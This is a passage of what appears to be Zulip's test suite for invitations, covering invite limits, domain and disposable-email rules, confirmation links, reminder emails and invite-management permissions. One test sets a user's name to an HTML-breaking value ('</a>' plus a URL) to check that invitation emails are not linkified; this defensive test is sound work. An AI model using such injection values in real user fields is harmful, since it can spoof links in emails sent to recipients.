invitee_msg, signups_stream_msg, inviter_msg, secret_msg = Message.objects.all().order_by(
"-id"
)[0:4]
self.assertEqual(secret_msg.id, secret_msg_id)
self.assertEqual(inviter_msg.sender.email, "notification-bot@zulip.com")
self.assertTrue(
inviter_msg.content.startswith(
f"alice_zulip.com <`{invitee_profile.email}`> accepted your",
)
)
self.assertEqual(signups_stream_msg.sender.email, "notification-bot@zulip.com")
self.assertTrue(
signups_stream_msg.content.startswith(
f"@_**alice_zulip.com|{invitee_profile.id}** just signed up",
)
)
self.assertEqual(invitee_msg.sender.email, "welcome-bot@zulip.com")
self.assertTrue(invitee_msg.content.startswith("Hello, and welcome to Zulip!"))
def test_multi_user_invite(self) -> None:
"""
Invites multiple users with a variety of delimiters.
"""
self.login("hamlet")
# Intentionally use a weird string.
self.assert_json_success(
self.invite(
"""bob-test@zulip.com, carol-test@zulip.com,
dave-test@zulip.com
earl-test@zulip.com""",
["Denmark"],
)
)
for user in ("bob", "carol", "dave", "earl"):
self.assertTrue(find_key_by_email(f"{user}-test@zulip.com"))
self.check_sent_emails(
[
"bob-test@zulip.com",
"carol-test@zulip.com",
"dave-test@zulip.com",
"earl-test@zulip.com",
]
)
def test_max_invites_model(self) -> None:
realm = get_realm("zulip")
self.assertEqual(realm.max_invites, settings.INVITES_DEFAULT_REALM_DAILY_MAX)
realm.max_invites = 3
realm.save()
self.assertEqual(get_realm("zulip").max_invites, 3)
realm.max_invites = settings.INVITES_DEFAULT_REALM_DAILY_MAX
realm.save()
def test_invite_too_many_users(self) -> None:
# Only a light test of this pathway; e.g. doesn't test that
# the limit gets reset after 24 hours
self.login("iago")
invitee_emails = "1@zulip.com, 2@zulip.com"
self.invite(invitee_emails, ["Denmark"])
invitee_emails = ", ".join(str(i) for i in range(get_realm("zulip").max_invites - 1))
self.assert_json_error(
self.invite(invitee_emails, ["Denmark"]),
"You do not have enough remaining invites for today. "
"Please contact desdemona+admin@zulip.com to have your limit raised. "
"No invitations were sent.",
)
def test_missing_or_invalid_params(self) -> None:
"""
Tests inviting with various missing or invalid parameters.
"""
realm = get_realm("zulip")
do_set_realm_property(realm, "emails_restricted_to_domains", True, acting_user=None)
self.login("hamlet")
invitee_emails = "foo@zulip.com"
self.assert_json_error(
self.invite(invitee_emails, []),
"You must specify at least one stream for invitees to join.",
)
for address in ("noatsign.com", "outsideyourdomain@example.net"):
self.assert_json_error(
self.invite(address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.",
)
self.check_sent_emails([])
self.assert_json_error(
self.invite("", ["Denmark"]), "You must specify at least one email address."
)
self.check_sent_emails([])
def test_guest_user_invitation(self) -> None:
"""
        Guest users can't invite new users.
"""
self.login("polonius")
invitee = "alice-test@zulip.com"
self.assert_json_error(self.invite(invitee, ["Denmark"]), "Not allowed for guest users")
self.assertEqual(find_key_by_email(invitee), None)
self.check_sent_emails([])
def test_invalid_stream(self) -> None:
"""
Tests inviting to a non-existent stream.
"""
self.login("hamlet")
self.assert_json_error(
self.invite("iago-test@zulip.com", ["NotARealStream"]),
f"Stream does not exist with id: {self.INVALID_STREAM_ID}. No invites were sent.",
)
self.check_sent_emails([])
def test_invite_existing_user(self) -> None:
"""
If you invite an address already using Zulip, no invitation is sent.
"""
self.login("hamlet")
hamlet_email = "hAmLeT@zUlIp.com"
result = self.invite(hamlet_email, ["Denmark"])
self.assert_json_error(result, "We weren't able to invite anyone.")
self.assertFalse(
PreregistrationUser.objects.filter(email__iexact=hamlet_email).exists(),
)
self.check_sent_emails([])
def normalize_string(self, s: str) -> str:
s = s.strip()
return re.sub(r"\s+", " ", s)
def test_invite_links_in_name(self) -> None:
"""
        Names containing links or HTML must not become clickable links
        in the invitation email.
"""
hamlet = self.example_user("hamlet")
self.login_user(hamlet)
# Test we properly handle links in user full names
do_change_full_name(hamlet, "</a> https://www.google.com", hamlet)
result = self.invite("newuser@zulip.com", ["Denmark"])
self.assert_json_success(result)
self.check_sent_emails(["newuser@zulip.com"])
from django.core.mail import outbox
body = self.normalize_string(outbox[0].alternatives[0][0])
# Verify that one can't get Zulip to send invitation emails
# that third-party products will linkify using the full_name
# field, because we've included that field inside the mailto:
# link for the sender.
self.assertIn(
'<a href="mailto:hamlet@zulip.com" style="color:#46aa8f; text-decoration:underline"></a> https://www.google.com (hamlet@zulip.com)</a> wants',
body,
)
# TODO: Ideally, this test would also test the Invitation
# Reminder email generated, but the test setup for that is
# annoying.
def test_invite_some_existing_some_new(self) -> None:
"""
If you invite a mix of already existing and new users, invitations are
only sent to the new users.
"""
self.login("hamlet")
existing = [self.example_email("hamlet"), "othello@zulip.com"]
new = ["foo-test@zulip.com", "bar-test@zulip.com"]
invitee_emails = "\n".join(existing + new)
self.assert_json_error(
self.invite(invitee_emails, ["Denmark"]),
"Some of those addresses are already using Zulip, \
so we didn't send them an invitation. We did send invitations to everyone else!",
)
# We only created accounts for the new users.
for email in existing:
self.assertRaises(
PreregistrationUser.DoesNotExist,
lambda: PreregistrationUser.objects.get(email=email),
)
for email in new:
self.assertTrue(PreregistrationUser.objects.get(email=email))
# We only sent emails to the new users.
self.check_sent_emails(new)
prereg_user = PreregistrationUser.objects.get(email="foo-test@zulip.com")
self.assertEqual(prereg_user.email, "foo-test@zulip.com")
def test_invite_outside_domain_in_closed_realm(self) -> None:
"""
In a realm with `emails_restricted_to_domains = True`, you can't invite people
        with a different domain from that of the realm or your email address.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = True
zulip_realm.save()
self.login("hamlet")
external_address = "foo@example.com"
self.assert_json_error(
self.invite(external_address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.",
)
def test_invite_using_disposable_email(self) -> None:
"""
In a realm with `disallow_disposable_email_addresses = True`, you can't invite
people with a disposable domain.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.disallow_disposable_email_addresses = True
zulip_realm.save()
self.login("hamlet")
external_address = "foo@mailnator.com"
self.assert_json_error(
self.invite(external_address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.",
)
def test_invite_outside_domain_in_open_realm(self) -> None:
"""
In a realm with `emails_restricted_to_domains = False`, you can invite people
        with a different domain from that of the realm or your email address.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.save()
self.login("hamlet")
external_address = "foo@example.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
def test_invite_outside_domain_before_closing(self) -> None:
"""
If you invite someone with a different domain from that of the realm
        when `emails_restricted_to_domains = False`, but `emails_restricted_to_domains`
        later changes to True, the invitation should succeed but the invitee's signup
attempt should fail.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.save()
self.login("hamlet")
external_address = "foo@example.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.emails_restricted_to_domains = True
zulip_realm.save()
result = self.submit_reg_form_for_user("foo@example.com", "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response("only allows users with email addresses", result)
def test_disposable_emails_before_closing(self) -> None:
"""
        If you invite someone with a disposable email when
        `disallow_disposable_email_addresses = False`, but the setting
        later changes to True, the invitation should succeed
        but the invitee's signup attempt should fail.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.disallow_disposable_email_addresses = False
zulip_realm.save()
self.login("hamlet")
external_address = "foo@mailnator.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.disallow_disposable_email_addresses = True
zulip_realm.save()
result = self.submit_reg_form_for_user("foo@mailnator.com", "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response("Please sign up using a real email address.", result)
def test_invite_with_email_containing_plus_before_closing(self) -> None:
"""
        If you invite someone with an email containing a plus sign when
        `emails_restricted_to_domains = False`, but later change
        `emails_restricted_to_domains = True`, the invitation should
        succeed but the invitee's signup attempt should fail, since
        users are not allowed to sign up with an email containing '+'
        when the realm is restricted to its domains.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.save()
self.login("hamlet")
external_address = "foo+label@zulip.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.emails_restricted_to_domains = True
zulip_realm.save()
result = self.submit_reg_form_for_user(external_address, "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response(
"Zulip Dev, does not allow signups using emails\n that contains +", result
)
def test_invalid_email_check_after_confirming_email(self) -> None:
self.login("hamlet")
email = "test@zulip.com"
self.assert_json_success(self.invite(email, ["Denmark"]))
obj = Confirmation.objects.get(confirmation_key=find_key_by_email(email))
prereg_user = obj.content_object
prereg_user.email = "invalid.email"
prereg_user.save()
result = self.submit_reg_form_for_user(email, "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response(
"The email address you are trying to sign up with is not valid", result
)
def test_invite_with_non_ascii_streams(self) -> None:
"""
Inviting someone to streams with non-ASCII characters succeeds.
"""
self.login("hamlet")
invitee = "alice-test@zulip.com"
stream_name = "hümbüǵ"
# Make sure we're subscribed before inviting someone.
self.subscribe(self.example_user("hamlet"), stream_name)
self.assert_json_success(self.invite(invitee, [stream_name]))
def test_invitation_reminder_email(self) -> None:
from django.core.mail import outbox
        # All users belong to the zulip realm.
referrer_name = "hamlet"
current_user = self.example_user(referrer_name)
self.login_user(current_user)
invitee_email = self.nonreg_email("alice")
self.assert_json_success(self.invite(invitee_email, ["Denmark"]))
self.assertTrue(find_key_by_email(invitee_email))
self.check_sent_emails([invitee_email])
data = {"email": invitee_email, "referrer_email": current_user.email}
invitee = PreregistrationUser.objects.get(email=data["email"])
referrer = self.example_user(referrer_name)
link = create_confirmation_link(invitee, Confirmation.INVITATION)
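        # Build the reminder email context by hand, mirroring what the
        # invitation pathway does.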
context = common_context(referrer)
context.update(
activate_url=link,
referrer_name=referrer.full_name,
referrer_email=referrer.email,
referrer_realm_name=referrer.realm.name,
)
with self.settings(EMAIL_BACKEND="django.core.mail.backends.console.EmailBackend"):
email = data["email"]
send_future_email(
"zerver/emails/invitation_reminder",
referrer.realm,
to_emails=[email],
from_address=FromAddress.no_reply_placeholder,
context=context,
)
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now()
)
self.assert_length(email_jobs_to_deliver, 1)
email_count = len(outbox)
for job in email_jobs_to_deliver:
deliver_scheduled_emails(job)
self.assert_length(outbox, email_count + 1)
self.assertEqual(self.email_envelope_from(outbox[-1]), settings.NOREPLY_EMAIL_ADDRESS)
self.assertIn(FromAddress.NOREPLY, self.email_display_from(outbox[-1]))
        # Now verify that signing up clears scheduled invitation reminder emails.
with self.settings(EMAIL_BACKEND="django.core.mail.backends.console.EmailBackend"):
email = data["email"]
send_future_email(
"zerver/emails/invitation_reminder",
referrer.realm,
to_emails=[email],
from_address=FromAddress.no_reply_placeholder,
context=context,
)
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER
)
self.assert_length(email_jobs_to_deliver, 1)
self.register(invitee_email, "test")
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER
)
self.assert_length(email_jobs_to_deliver, 0)
def test_no_invitation_reminder_when_link_expires_quickly(self) -> None:
self.login("hamlet")
# Check invitation reminder email is scheduled with 4 day link expiry
with self.settings(INVITATION_LINK_VALIDITY_DAYS=4):
self.invite("alice@zulip.com", ["Denmark"])
self.assertEqual(
ScheduledEmail.objects.filter(type=ScheduledEmail.INVITATION_REMINDER).count(), 1
)
# Check invitation reminder email is not scheduled with 3 day link expiry
with self.settings(INVITATION_LINK_VALIDITY_DAYS=3):
self.invite("bob@zulip.com", ["Denmark"])
self.assertEqual(
ScheduledEmail.objects.filter(type=ScheduledEmail.INVITATION_REMINDER).count(), 1
)
# make sure users can't take a valid confirmation key from another
# pathway and use it with the invitation URL route
def test_confirmation_key_of_wrong_type(self) -> None:
email = self.nonreg_email("alice")
realm = get_realm("zulip")
inviter = self.example_user("iago")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
url = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = url.split("/")[-1]
# Mainly a test of get_object_from_key, rather than of the invitation pathway
with self.assertRaises(ConfirmationKeyException) as cm:
get_object_from_key(registration_key, Confirmation.INVITATION)
self.assertEqual(cm.exception.error_type, ConfirmationKeyException.DOES_NOT_EXIST)
# Verify that using the wrong type doesn't work in the main confirm code path
email_change_url = create_confirmation_link(prereg_user, Confirmation.EMAIL_CHANGE)
email_change_key = email_change_url.split("/")[-1]
url = "/accounts/do_confirm/" + email_change_key
result = self.client_get(url)
self.assert_in_success_response(
["Whoops. We couldn't find your confirmation link in the system."], result
)
def test_confirmation_expired(self) -> None:
email = self.nonreg_email("alice")
realm = get_realm("zulip")
inviter = self.example_user("iago")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
url = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = url.split("/")[-1]
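        # Backdate the confirmation so the link is past its expiry window.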
conf = Confirmation.objects.filter(confirmation_key=registration_key).first()
conf.date_sent -= datetime.timedelta(weeks=3)
conf.save()
target_url = "/" + url.split("/", 3)[3]
result = self.client_get(target_url)
self.assert_in_success_response(
["Whoops. The confirmation link has expired or been deactivated."], result
)
def test_send_more_than_one_invite_to_same_user(self) -> None:
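        """
        When the same address is invited several times, accepting one invite
        should revoke the remaining invites in that realm, while invites from
        other realms stay active.
        """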
self.user_profile = self.example_user("iago")
streams = []
for stream_name in ["Denmark", "Scotland"]:
streams.append(get_stream(stream_name, self.user_profile.realm))
do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
prereg_user = PreregistrationUser.objects.get(email="foo@zulip.com")
do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
# Also send an invite from a different realm.
lear = get_realm("lear")
lear_user = self.lear_user("cordelia")
do_invite_users(lear_user, ["foo@zulip.com"], [], False)
invites = PreregistrationUser.objects.filter(email__iexact="foo@zulip.com")
self.assert_length(invites, 4)
do_create_user(
"foo@zulip.com",
"password",
self.user_profile.realm,
"full name",
prereg_user=prereg_user,
acting_user=None,
)
accepted_invite = PreregistrationUser.objects.filter(
email__iexact="foo@zulip.com", status=confirmation_settings.STATUS_ACTIVE
)
revoked_invites = PreregistrationUser.objects.filter(
email__iexact="foo@zulip.com", status=confirmation_settings.STATUS_REVOKED
)
        # If a user was invited more than once, then once they accept one
        # invite and register, the others must be revoked.
self.assert_length(accepted_invite, 1)
self.assertEqual(accepted_invite[0].id, prereg_user.id)
expected_revoked_invites = set(invites.exclude(id=prereg_user.id).exclude(realm=lear))
self.assertEqual(set(revoked_invites), expected_revoked_invites)
self.assertEqual(
PreregistrationUser.objects.get(email__iexact="foo@zulip.com", realm=lear).status, 0
)
def test_confirmation_obj_not_exist_error(self) -> None:
"""Since the key is a param input by the user to the registration endpoint,
if it inserts an invalid value, the confirmation object won't be found. This
tests if, in that scenario, we handle the exception by redirecting the user to
the confirmation_link_expired_error page.
"""
email = self.nonreg_email("alice")
password = "password"
realm = get_realm("zulip")
inviter = self.example_user("iago")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = "invalid_confirmation_key"
url = "/accounts/register/"
response = self.client_post(
url, {"key": registration_key, "from_confirmation": 1, "full_nme": "alice"}
)
self.assertEqual(response.status_code, 404)
self.assert_in_response("The registration link has expired or is not valid.", response)
registration_key = confirmation_link.split("/")[-1]
response = self.client_post(
url, {"key": registration_key, "from_confirmation": 1, "full_nme": "alice"}
)
self.assert_in_success_response(["We just need you to do one last thing."], response)
response = self.submit_reg_form_for_user(email, password, key=registration_key)
self.assertEqual(response.status_code, 302)
def test_validate_email_not_already_in_realm(self) -> None:
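        """
        Reusing a registration key after the account has already been created
        should redirect to the login page with already_registered set.
        """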
email = self.nonreg_email("alice")
password = "password"
realm = get_realm("zulip")
inviter = self.example_user("iago")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = confirmation_link.split("/")[-1]
url = "/accounts/register/"
self.client_post(
url, {"key": registration_key, "from_confirmation": 1, "full_name": "alice"}
)
self.submit_reg_form_for_user(email, password, key=registration_key)
url = "/accounts/register/"
response = self.client_post(
url, {"key": registration_key, "from_confirmation": 1, "full_name": "alice"}
)
self.assertEqual(response.status_code, 302)
self.assertEqual(
response.url,
reverse("login") + "?" + urlencode({"email": email, "already_registered": 1}),
)
def test_confirmation_link_in_manual_license_plan(self) -> None:
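        """
        On a manual license management plan, signups via a confirmation link
        are blocked once all licenses are in use.
        """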
inviter = self.example_user("iago")
realm = get_realm("zulip")
email = self.nonreg_email("alice")
realm = get_realm("zulip")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = confirmation_link.split("/")[-1]
url = "/accounts/register/"
self.client_post(
url, {"key": registration_key, "from_confirmation": 1, "full_name": "alice"}
)
response = self.submit_reg_form_for_user(email, "password", key=registration_key)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "http://zulip.testserver/")
self.subscribe_realm_to_monthly_plan_on_manual_license_management(realm, 5, 5)
email = self.nonreg_email("bob")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = confirmation_link.split("/")[-1]
url = "/accounts/register/"
self.client_post(url, {"key": registration_key, "from_confirmation": 1, "full_name": "bob"})
response = self.submit_reg_form_for_user(email, "password", key=registration_key)
self.assert_in_success_response(
["New members cannot join this organization because all Zulip licenses are"], response
)
class InvitationsTestCase(InviteUserBase):
def test_do_get_user_invites(self) -> None:
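        """
        Admins see every active invitation in their realm (including multiuse
        invites); non-admins see only the invitations they sent themselves.
        """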
self.login("iago")
user_profile = self.example_user("iago")
hamlet = self.example_user("hamlet")
othello = self.example_user("othello")
prereg_user_one = PreregistrationUser(email="TestOne@zulip.com", referred_by=user_profile)
prereg_user_one.save()
prereg_user_two = PreregistrationUser(email="TestTwo@zulip.com", referred_by=user_profile)
prereg_user_two.save()
prereg_user_three = PreregistrationUser(email="TestThree@zulip.com", referred_by=hamlet)
prereg_user_three.save()
prereg_user_four = PreregistrationUser(email="TestFour@zulip.com", referred_by=othello)
prereg_user_four.save()
prereg_user_other_realm = PreregistrationUser(
email="TestOne@zulip.com", referred_by=self.mit_user("sipbtest")
)
prereg_user_other_realm.save()
multiuse_invite = MultiuseInvite.objects.create(
referred_by=user_profile, realm=user_profile.realm
)
create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
self.assert_length(do_get_user_invites(user_profile), 5)
self.assert_length(do_get_user_invites(hamlet), 1)
self.assert_length(do_get_user_invites(othello), 1)
def test_successful_get_open_invitations(self) -> None:
"""
A GET call to /json/invites returns all unexpired invitations.
"""
realm = get_realm("zulip")
days_to_activate = getattr(settings, "INVITATION_LINK_VALIDITY_DAYS", "Wrong")
active_value = getattr(confirmation_settings, "STATUS_ACTIVE", "Wrong")
self.assertNotEqual(days_to_activate, "Wrong")
self.assertNotEqual(active_value, "Wrong")
self.login("iago")
user_profile = self.example_user("iago")
prereg_user_one = PreregistrationUser(email="TestOne@zulip.com", referred_by=user_profile)
prereg_user_one.save()
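        # Create an invitation whose invited_at falls outside the validity
        # window, so it should be omitted from the results.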
expired_datetime = timezone_now() - datetime.timedelta(days=(days_to_activate + 1))
prereg_user_two = PreregistrationUser(email="TestTwo@zulip.com", referred_by=user_profile)
prereg_user_two.save()
PreregistrationUser.objects.filter(id=prereg_user_two.id).update(
invited_at=expired_datetime
)
prereg_user_three = PreregistrationUser(
email="TestThree@zulip.com", referred_by=user_profile, status=active_value
)
prereg_user_three.save()
hamlet = self.example_user("hamlet")
othello = self.example_user("othello")
multiuse_invite_one = MultiuseInvite.objects.create(referred_by=hamlet, realm=realm)
create_confirmation_link(multiuse_invite_one, Confirmation.MULTIUSE_INVITE)
multiuse_invite_two = MultiuseInvite.objects.create(referred_by=othello, realm=realm)
create_confirmation_link(multiuse_invite_two, Confirmation.MULTIUSE_INVITE)
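        # Expire the second multiuse invite by backdating its confirmation.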
confirmation = Confirmation.objects.last()
confirmation.date_sent = expired_datetime
confirmation.save()
result = self.client_get("/json/invites")
self.assertEqual(result.status_code, 200)
invites = orjson.loads(result.content)["invites"]
self.assert_length(invites, 2)
self.assertFalse(invites[0]["is_multiuse"])
self.assertEqual(invites[0]["email"], "TestOne@zulip.com")
self.assertTrue(invites[1]["is_multiuse"])
self.assertEqual(invites[1]["invited_by_user_id"], hamlet.id)
def test_successful_delete_invitation(self) -> None:
"""
A DELETE call to /json/invites/<ID> should delete the invite and
any scheduled invitation reminder emails.
"""
self.login("iago")
invitee = "DeleteMe@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
prereg_user = PreregistrationUser.objects.get(email=invitee)
# Verify that the scheduled email exists.
ScheduledEmail.objects.get(address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
result = self.client_delete("/json/invites/" + str(prereg_user.id))
self.assertEqual(result.status_code, 200)
error_result = self.client_delete("/json/invites/" + str(prereg_user.id))
self.assert_json_error(error_result, "No such invitation")
self.assertRaises(
ScheduledEmail.DoesNotExist,
lambda: ScheduledEmail.objects.get(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
),
)
def test_successful_member_delete_invitation(self) -> None:
"""
        A DELETE call from a member account to /json/invites/<ID> should delete the invite and
any scheduled invitation reminder emails.
"""
user_profile = self.example_user("hamlet")
self.login_user(user_profile)
invitee = "DeleteMe@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
# Verify that the scheduled email exists.
prereg_user = PreregistrationUser.objects.get(email=invitee, referred_by=user_profile)
ScheduledEmail.objects.get(address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
# Verify another non-admin can't delete
result = self.api_delete(
self.example_user("othello"), "/api/v1/invites/" + str(prereg_user.id)
)
self.assert_json_error(result, "Must be an organization administrator")
# Verify that the scheduled email still exists.
prereg_user = PreregistrationUser.objects.get(email=invitee, referred_by=user_profile)
ScheduledEmail.objects.get(address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
# Verify deletion works.
result = self.api_delete(user_profile, "/api/v1/invites/" + str(prereg_user.id))
self.assertEqual(result.status_code, 200)
result = self.api_delete(user_profile, "/api/v1/invites/" + str(prereg_user.id))
self.assert_json_error(result, "No such invitation")
self.assertRaises(
ScheduledEmail.DoesNotExist,
lambda: ScheduledEmail.objects.get(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
),
)
def test_delete_owner_invitation(self) -> None:
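        """
        Only an organization owner may delete an invitation that was sent
        with realm owner privileges.
        """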
self.login("desdemona")
owner = self.example_user("desdemona")
invitee = "DeleteMe@zulip.com"
self.assert_json_success(
self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_OWNER"]
)
)
prereg_user = PreregistrationUser.objects.get(email=invitee)
result = self.api_delete(
self.example_user("iago"), "/api/v1/invites/" + str(prereg_user.id)
)
self.assert_json_error(result, "Must be an organization owner")
result = self.api_delete(owner, "/api/v1/invites/" + str(prereg_user.id))
self.assert_json_success(result)
result = self.api_delete(owner, "/api/v1/invites/" + str(prereg_user.id))
self.assert_json_error(result, "No such invitation")
self.assertRaises(
ScheduledEmail.DoesNotExist,
lambda: ScheduledEmail.objects.get(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
),
)
def test_delete_multiuse_invite(self) -> None:
"""
A DELETE call to /json/invites/multiuse<ID> should delete the
multiuse_invite.
"""
self.login("iago")
zulip_realm = get_realm("zulip")
multiuse_invite = MultiuseInvite.objects.create(
referred_by=self.example_user("hamlet"), realm=zulip_realm
)
create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
result = self.client_delete("/json/invites/multiuse/" + str(multiuse_invite.id))
self.assertEqual(result.status_code, 200)
self.assertIsNone(MultiuseInvite.objects.filter(id=multiuse_invite.id).first())
# Test that trying to double-delete fails
error_result = self.client_delete("/json/invites/multiuse/" + str(multiuse_invite.id))
self.assert_json_error(error_result, "No such invitation")
        # Test deleting an owner multiuse_invite.
multiuse_invite = MultiuseInvite.objects.create(
referred_by=self.example_user("desdemona"),
realm=zulip_realm,
invited_as=PreregistrationUser.INVITE_AS["REALM_OWNER"],
)
create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
error_result = self.client_delete("/json/invites/multiuse/" + str(multiuse_invite.id))
self.assert_json_error(error_result, "Must be an organization owner")
self.login("desdemona")
result = self.client_delete("/json/invites/multiuse/" + str(multiuse_invite.id))
self.assert_json_success(result)
self.assertIsNone(MultiuseInvite.objects.filter(id=multiuse_invite.id).first())
# Test deleting multiuse invite from another realm
mit_realm = get_realm("zephyr")
multiuse_invite_in_mit = MultiuseInvite.objects.create(
referred_by=self.mit_user("sipbtest"), realm=mit_realm
)
create_confirmation_link(multiuse_invite_in_mit, Confirmation.MULTIUSE_INVITE)
error_result = self.client_delete(
"/json/invites/multiuse/" + str(multiuse_invite_in_mit.id)
)
self.assert_json_error(error_result, "No such invitation")
def test_successful_resend_invitation(self) -> None:
"""
        A POST call to /json/invites/<ID>/resend should resend the invitation
        email and replace any scheduled invitation reminder email.
"""
self.login("iago")
invitee = "resend_me@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
prereg_user = PreregistrationUser.objects.get(email=invitee)
        # Verify the original invite email was sent, then clear it from the outbox.
self.check_sent_emails([invitee])
from django.core.mail import outbox
outbox.pop()
# Verify that the scheduled email exists.
scheduledemail_filter = ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
)
self.assertEqual(scheduledemail_filter.count(), 1)
original_timestamp = scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
# Resend invite
result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assertEqual(
ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
).count(),
1,
)
# Check that we have exactly one scheduled email, and that it is different
self.assertEqual(scheduledemail_filter.count(), 1)
self.assertNotEqual(
original_timestamp, scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
)
self.assertEqual(result.status_code, 200)
error_result = self.client_post("/json/invites/" + str(9999) + "/resend")
self.assert_json_error(error_result, "No such invitation")
self.check_sent_emails([invitee])
def test_successful_member_resend_invitation(self) -> None:
"""A POST call from member a account to /json/invites/<ID>/resend
should send an invitation reminder email and delete any
scheduled invitation reminder email if they send the invite.
"""
self.login("hamlet")
user_profile = self.example_user("hamlet")
invitee = "resend_me@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
        # Verify hamlet has only one invitation (members can only resend invitations they sent themselves).
invitation = PreregistrationUser.objects.filter(referred_by=user_profile)
self.assert_length(invitation, 1)
prereg_user = PreregistrationUser.objects.get(email=invitee)
        # Verify the original invite email was sent, then clear it from the outbox.
self.check_sent_emails([invitee])
from django.core.mail import outbox
outbox.pop()
# Verify that the scheduled email exists.
scheduledemail_filter = ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
)
self.assertEqual(scheduledemail_filter.count(), 1)
original_timestamp = scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
# Resend invite
result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assertEqual(
ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
).count(),
1,
)
# Check that we have exactly one scheduled email, and that it is different
self.assertEqual(scheduledemail_filter.count(), 1)
self.assertNotEqual(
original_timestamp, scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
)
self.assertEqual(result.status_code, 200)
error_result = self.client_post("/json/invites/" + str(9999) + "/resend")
self.assert_json_error(error_result, "No such invitation")
self.check_sent_emails([invitee])
self.logout()
self.login("othello")
invitee = "TestOne@zulip.com"
prereg_user_one = PreregistrationUser(email=invitee, referred_by=user_profile)
prereg_user_one.save()
prereg_user = PreregistrationUser.objects.get(email=invitee)
error_result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assert_json_error(error_result, "Must be an organization administrator")
def test_resend_owner_invitation(self) -> None:
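        """
        Only an organization owner may resend an invitation that was sent
        with realm owner privileges.
        """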
self.login("desdemona")
invitee = "resend_owner@zulip.com"
self.assert_json_success(
self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_OWNER"]
)
)
self.check_sent_emails([invitee])
scheduledemail_filter = ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
)
self.assertEqual(scheduledemail_filter.count(), 1)
original_timestamp = scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
# Test only organization owners can resend owner invitation.
self.login("iago")
prereg_user = PreregistrationUser.objects.get(email=invitee)
error_result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assert_json_error(error_result, "Must be an organization owner")
self.login("desdemona")
result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assert_json_success(result)
